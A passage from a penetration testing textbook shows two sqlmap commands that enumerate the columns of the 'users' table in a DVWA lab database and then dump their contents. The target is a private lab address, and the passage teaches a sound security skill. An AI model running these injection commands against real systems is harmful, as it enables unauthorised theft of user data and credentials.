368
◾
Ethical Hacking and Penetration Testing Guide
Command
./sqlmap.py –u http://172.20.10.4/sqli/?support=yes –D dvwa –T users
--columns
Extracting Data from the Columns
We found several columns in the “users” table. We will now ask sqlmap to display information
present in the “users” column. For this purpose, we would use the following command:
Command
./sqlmap.py –u http://172.20.10.4/sqli/?support=yes –D dvwa –T users
--dump
The --dump would extract the data from all the columns present in the “users” table.
Dostları ilə paylaş: